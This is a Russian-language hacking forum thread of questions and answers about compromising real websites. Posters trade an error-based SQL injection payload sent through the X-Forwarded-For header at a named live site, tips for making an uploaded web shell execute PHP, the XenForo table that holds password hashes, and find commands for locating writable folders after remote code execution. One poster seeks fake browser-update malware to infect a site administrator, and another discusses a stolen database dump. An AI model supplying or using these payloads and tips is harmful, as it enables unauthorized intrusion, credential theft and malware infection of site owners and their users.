[Задай Вопрос - Получи Ответ]

Discussion in 'Веб-уязвимости' started by Rombl4, 17 Nov 2008.

  1. etime

    etime New Member

    Joined:
    7 Nov 2018
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Можете подсказать? Залил шелл, но он не исполняет php код. Выводит только html. Выглядит это вот так. Вопрос, как заставить работать php? [​IMG]
     
  2. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Мрачно выглядит...

    Попробуй сначала залить шелла с расширением .txt и посмотри корректность кода. Если всё корректно, то придется воевать с .htaccess в директории, или искать другие директории под запись.
     
    erwerr2321 and etime like this.
  3. etime

    etime New Member

    Joined:
    7 Nov 2018
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Спасибо, попробую.
     
  4. romanshkabo

    romanshkabo New Member

    Joined:
    3 Jan 2019
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Можно чуть подробней. Где почитать можно? При обращении к site.ru/ind%ex.php получаю 400 ошибку. В остальных случаях 404
     
  5. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
  6. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Не получается сделать вывод error based, может что-то фильтруется ?

    Сайт: http://drop-bux.ru

    Уязвимость в заголовках headers

    X-Forwarded-For: 1'"
     
  7. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Все стандартно крутится: X-Forwarded-For: 123"\'and(extractvalue(1,concat(0x3b,(select(version())))))#
     
  8. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Действительно, видать после армии совсем ебанулся, спасибо !
     
  9. ProstoZheka

    ProstoZheka New Member

    Joined:
    18 Jan 2019
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Ругается на сокет, значит с пакетами что-то не так. Можно посмотреть что он на сайт отправляет через wireshark, а там довольно читабельно должно быть
     
  10. krujka121

    krujka121 New Member

    Joined:
    2 Feb 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    [​IMG]
    Могу менять значение max_age. Это php иньекция, или как?
     
  11. L73898UNIT

    L73898UNIT New Member

    Joined:
    9 Dec 2018
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Привет, не знаю в какую тему лучше написать, напишу сюда.
    Есть сайтик, на нем залит шелл. На сайтике есть сабдомены, у каждого сабдомена есть своя админка.
    Задача: заразить с помощью админки самого админа (когда он логинится в свой сабдомен).
    Для себя грубо сформулировал последовательность: Админ логинится, в зависимости от ОС/Браузера через н-ое время появляется "Ваш браузер устарел тра-ляля", автоматом загружается "обновление.exe". Т.к. последний раз с малварью имел несколько лет назад (и то поверхостно), сейчас совсем не понимаю реальных возможностей данного способа. Как барузер и ос будут реагировать на данный способ? Где можно взять скрипты фейк обновления по вышеупомянутым параметрам? Возможно есть человек, который сможет реализовать данный задум за разумную цену.

    UPD: Возможно, кто-то знает способ более легкий и изящнее, буду рад этой информации...
     
  12. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Нет
     
  13. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Добрый. Подскажите структуру таблиц базы xenforo, какой у него дефолтный префикс и в какой таблице и колонке хранятся хэш соль?
     
  14. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    221
    Likes Received:
    119
    Reputations:
    13
    Таблица xf_user_authenticate
    колонка data
     
    karkajoi likes this.
  15. holdik

    holdik New Member

    Joined:
    4 Nov 2017
    Messages:
    13
    Likes Received:
    4
    Reputations:
    2
    Имею RCE через passthru, имею тысячи папок, как можно найти с правами на запись?)
    Поделитесь командой плз
     
  16. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    221
    Likes Received:
    119
    Reputations:
    13
    find -type f -maxdepth 1 -writable
     
    holdik likes this.
  17. suzi

    suzi New Member

    Joined:
    6 Apr 2019
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    Если папки, то, скорее find -type d -writable 2>/dev/null
     
    dmax0fw likes this.
  18. careberga

    careberga New Member

    Joined:
    3 May 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста

    Скачиваю дамп с одного сайта некоторые файлы в полном порядке и читабельны. Некоторые полностью а некоторые частично вместо значений имеют вот такой знак !~!1 что это означает? И как с этим бороться?
     
  19. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Может не текстовый файл?
     
  20. careberga

    careberga New Member

    Joined:
    3 May 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Там должны быть числа единственное что могу предположить что там не на английском. Возможно ли что это связано с кодировкой языка? Там язык далекий от инглиша и если это так какую команду использовать?